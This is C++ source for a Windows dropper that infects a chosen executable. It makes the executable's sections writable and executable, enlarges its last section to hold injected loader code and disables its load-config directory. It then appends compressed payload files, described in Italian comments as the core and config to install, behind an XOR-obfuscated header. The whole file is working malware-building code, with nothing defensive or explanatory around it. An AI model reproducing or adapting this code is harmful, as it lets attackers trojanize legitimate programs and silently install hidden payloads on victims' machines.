// drop.cpp : Defines the entry point for the console application.
//

#define WIN32_LEAN_AND_MEAN
#define _CRT_SECURE_NO_DEPRECATE
#define STRICT

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#include <time.h>

#include "../aplib/lib/dll/aplib.h"

#include "drop.h"

#define PAGE_SIZE 4096

#pragma comment(linker, "/SECTION:.text,RWE")

void UnloadPE(PEInfo *pPEInfo);

LoaderInfo g_LoaderInfo;

PIMAGE_SECTION_HEADER __stdcall GetEnclosingSectionHeader(DWORD rva, PIMAGE_NT_HEADERS pNTHeader)
{
	PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(pNTHeader);
    unsigned i;
    
    for ( i=0; i < pNTHeader->FileHeader.NumberOfSections; i++)
    {
        if ( (rva >= section[i].VirtualAddress) && 
             (rva < (section[i].VirtualAddress + section[i].Misc.VirtualSize)))
            return &section[i];
    }
    
    return 0;
}

DWORD __stdcall RvaToOffset(DWORD Rva, PIMAGE_NT_HEADERS ImageNtHeaders)
{
	DWORD Offset = Rva;
	IMAGE_SECTION_HEADER *Img;

	Img = IMAGE_FIRST_SECTION(ImageNtHeaders);

	if (Rva < Img->PointerToRawData)
		return Rva;

	for (int i = 0; i < ImageNtHeaders->FileHeader.NumberOfSections; i++)
	{
		if (Rva >= Img[i].VirtualAddress &&
			Rva < (Img[i].VirtualAddress +
			Img[i].SizeOfRawData))
		{
			Offset -= Img[i].VirtualAddress;
			Offset += Img[i].PointerToRawData;

			return Offset;
		}
	}

	return NULL;

}

DWORD __stdcall OffsetToRva(DWORD Offset, PIMAGE_NT_HEADERS ImageNtHeaders)
{
	DWORD Rva = Offset, Limit, Start;
	IMAGE_SECTION_HEADER *Img;

	Img = IMAGE_FIRST_SECTION(ImageNtHeaders);

	if (Offset < Img->PointerToRawData)
		return Offset;

	for (int i = 0; i < ImageNtHeaders->FileHeader.NumberOfSections; i++)
	{
		if (Img[i].PointerToRawData)
			Start = Img[i].PointerToRawData;
		else
			Start = Img[i].VirtualAddress;

		if (Img[i].SizeOfRawData)
			Limit = Img[i].SizeOfRawData;
		else
			Limit = Img[i].Misc.VirtualSize;

		if (Offset >= Start && Offset < (Start + Limit))
		{
			if (Img[i].PointerToRawData != 0)
			{
				Offset -= Img[i].PointerToRawData;
				Offset += Img[i].VirtualAddress;
			}

			return Offset;
		}
	}
	return NULL;
}

DWORD __stdcall RoundUp(DWORD value, DWORD base)
{
	DWORD tmpValue = value;
	while((tmpValue % base) != 0)
		tmpValue++;
	return tmpValue;
}

DWORD __stdcall IntervalRand(DWORD Low, DWORD High)
{
	DWORD dwRand;

	dwRand = (unsigned int)(Low + (double)rand() * (High - Low + 1) / RAND_MAX);

	return dwRand;
}

PEInfo *LoadPE(TCHAR *FileName)
{
	PEInfo *pPEInfo;

	if(FileName == NULL)
	{
		_tprintf(_T("LoadPE: No input file specified.\n"));
		return NULL;
	}

	pPEInfo = (PEInfo *)VirtualAlloc(NULL, sizeof(PEInfo), MEM_COMMIT, PAGE_READWRITE);
	if(pPEInfo == NULL)
	{
		_tprintf(_T("LoadPE: Could not allocate %d bytes of memory.\n"), sizeof(PEInfo));
		return NULL;
	}

	pPEInfo->hPEFile = CreateFile(FileName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
	if(pPEInfo->hPEFile == INVALID_HANDLE_VALUE)
	{
		_tprintf(_T("LoadPE: Could not open %s.\n"), FileName);
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->hMappedFile = CreateFileMapping(pPEInfo->hPEFile, NULL, PAGE_READWRITE, NULL, GetFileSize(pPEInfo->hPEFile, NULL) + PAGE_SIZE*5, NULL);
	if(pPEInfo->hMappedFile == INVALID_HANDLE_VALUE)
	{
		_tprintf(_T("LoadPE: Could not create file mapping, handle = %08x.\n"), (ULONG_PTR)pPEInfo->hPEFile);
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->FileBase = MapViewOfFile(pPEInfo->hMappedFile, FILE_MAP_READ | FILE_MAP_WRITE, NULL, NULL, 0);
	if(pPEInfo->FileBase == NULL)
	{
		_tprintf(_T("LoadPE: Could not map file into memory, map handle = %08x.\n"), (ULONG_PTR)pPEInfo->hMappedFile);
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->ImageDosHeader = (PIMAGE_DOS_HEADER)pPEInfo->FileBase;
	if(pPEInfo->ImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
	{
		_tprintf(_T("LoadPE: %s is not a valid pe file.\n"), FileName);
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->ImageNtHeaders = MakePtr(PIMAGE_NT_HEADERS, pPEInfo->FileBase, pPEInfo->ImageDosHeader->e_lfanew);
	if(pPEInfo->ImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
	{
		_tprintf(_T("LoadPE: %s is not a valid pe file.\n"), FileName);
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->ImageFileHeader = &pPEInfo->ImageNtHeaders->FileHeader;
	pPEInfo->ImageOptionalHeader = &pPEInfo->ImageNtHeaders->OptionalHeader;

	PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pPEInfo->ImageNtHeaders);
	for(ULONG i = 0; i < pPEInfo->ImageFileHeader->NumberOfSections; i++)
		pSection[i].Characteristics |= IMAGE_SCN_MEM_WRITE; //all sections writeable

	pPEInfo->WorkingSection = &pSection[pPEInfo->ImageFileHeader->NumberOfSections - 1];

	g_LoaderInfo.CurrentOffset = (DWORD)((PUCHAR)pPEInfo->WorkingSection->PointerToRawData + pPEInfo->WorkingSection->SizeOfRawData);

	pPEInfo->WorkingSection->SizeOfRawData += PAGE_SIZE*5;
	pPEInfo->WorkingSection->SizeOfRawData = RoundUp(pPEInfo->WorkingSection->SizeOfRawData, pPEInfo->ImageOptionalHeader->FileAlignment);
	pPEInfo->WorkingSection->Misc.VirtualSize += PAGE_SIZE*5;

	pPEInfo->WorkingSection->Characteristics = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | 
												IMAGE_SCN_CNT_CODE | IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_CNT_UNINITIALIZED_DATA;

	pPEInfo->ImageOptionalHeader->SizeOfImage += PAGE_SIZE*5;

	//if load config directory is not 0, SEH inside the loader will not work, is related to RtlLookupFunctionTable inside ntdll.dll
	pPEInfo->ImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG].VirtualAddress = 0;
	pPEInfo->ImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG].Size = 0;
	return pPEInfo;
}

void UnloadPE(PEInfo *pPEInfo)
{
	if(pPEInfo != NULL)
	{
		if(pPEInfo->FileBase != NULL)
			UnmapViewOfFile(pPEInfo->FileBase);

		if(pPEInfo->hMappedFile != INVALID_HANDLE_VALUE)
			CloseHandle(pPEInfo->hMappedFile);

		if(pPEInfo->hPEFile != INVALID_HANDLE_VALUE)
			CloseHandle(pPEInfo->hPEFile);

		VirtualFree(pPEInfo, sizeof(PEInfo), MEM_RELEASE);
	}
}

void EncryptHeader(AppendFile *hdr)
{
	PUCHAR ptr = (PUCHAR)hdr;

	for(int i = 0; i < sizeof(AppendFile); i++)
		ptr[i] ^= 0x66;
}
// _param[0] = NULL;				// param[0] NULL
// _param[1] = SelectHost();		// Nome file da infettare...	
// _param[2] = configuration[0];	// directory di installazione
// _param[3] = H4_CoreTmp;			// core file name
// _param[4] = H4_ConfTmp;			// config file 
		
int _entry_main(int	num_param, CHAR* param[])
{
	//CHAR unpackDir[256];
	DWORD seekOffset;
	AppendFile af;
	DWORD BytesRead;

	if(num_param < 3)
		return 0;

	strncpy((char *)g_LoaderInfo.UnpackDir, param[2], strlen(param[2]));

	PEInfo *pPEInfo = LoadPE(param[1]);
	g_LoaderInfo.pPEInfo = pPEInfo;
	srand((unsigned int)time(NULL));
	ContinueWork(&g_LoaderInfo);
	seekOffset = pPEInfo->WorkingSection->PointerToRawData + pPEInfo->WorkingSection->SizeOfRawData;
	UnloadPE(pPEInfo);

	HANDLE hPEFile = CreateFile(param[1], GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	if(hPEFile == INVALID_HANDLE_VALUE)
	{
		printf("Could not open pe file for append.\n");
		return 0;
	}

	SetFilePointer(hPEFile, seekOffset, NULL, FILE_BEGIN);

	for(int i = 3; i < num_param; i++)
	{
		HANDLE hFileToAppend = CreateFile(param[i], GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
		if(hFileToAppend == INVALID_HANDLE_VALUE)
		{
			printf("Could not open %s.\n", param[i]);
			CloseHandle(hPEFile);
			return 0;
		}

		PCHAR buffer = (PCHAR)VirtualAlloc(NULL, GetFileSize(hFileToAppend, NULL), MEM_COMMIT, PAGE_READWRITE);
		if(buffer == NULL)
		{
			printf("Could not allocate buffer.\n");
			CloseHandle(hFileToAppend);
			CloseHandle(hPEFile);
			return 0;
		}

		if(!ReadFile(hFileToAppend, buffer, GetFileSize(hFileToAppend, NULL), &BytesRead, NULL))
		{
			printf("Error while reading file %s.\n", param[i]);
			VirtualFree(buffer, 0, MEM_RELEASE);
			CloseHandle(hFileToAppend);
			CloseHandle(hPEFile);
			return 0;
		}

		PCHAR packBuffer = (PCHAR)VirtualAlloc(NULL, aP_max_packed_size(GetFileSize(hFileToAppend, NULL)), MEM_COMMIT, PAGE_READWRITE);
		if(packBuffer == NULL)
		{
			printf("Could not allocate buffer.\n");
			VirtualFree(buffer, 0, MEM_RELEASE);
			CloseHandle(hFileToAppend);
			CloseHandle(hPEFile);
			return 0;
		}

		PCHAR workBuffer = (PCHAR)VirtualAlloc(NULL, aP_workmem_size(GetFileSize(hFileToAppend, NULL)), MEM_COMMIT, PAGE_READWRITE);
		if(packBuffer == NULL)
		{
			printf("Could not allocate buffer.\n");
			VirtualFree(buffer, 0, MEM_RELEASE);
			VirtualFree(packBuffer, 0, MEM_RELEASE);
			CloseHandle(hFileToAppend);
			CloseHandle(hPEFile);
			return 0;
		}

		ULONG packedSize = aP_pack(buffer, packBuffer, GetFileSize(hFileToAppend, NULL), workBuffer, NULL, NULL);

		memset(&af, 0, sizeof(af));
		
		// Choppa il pathname assoluto
		char * fname = strrchr(param[i], '\\');
		
		if( fname != NULL ) 
			fname++;
		else
			fname = param[i];

		strncpy((char *)af.fileName, fname, strlen(fname));

		af.fileSize = GetFileSize(hFileToAppend, NULL);
		af.packFileSize = packedSize;
		af.signature = 'DCKP';

		EncryptHeader(&af);

		WriteFile(hPEFile, &af, sizeof(af), &BytesRead, NULL);
		WriteFile(hPEFile, packBuffer, packedSize, &BytesRead, NULL);
		CloseHandle(hFileToAppend);
		VirtualFree(buffer, 0, MEM_RELEASE);
		VirtualFree(packBuffer, 0, MEM_RELEASE);
		VirtualFree(workBuffer, 0, MEM_RELEASE);
		//printf("%s appended.\n", param[i]);
	}

	CloseHandle(hPEFile);
	printf("Done.\n");
	return 0;
}

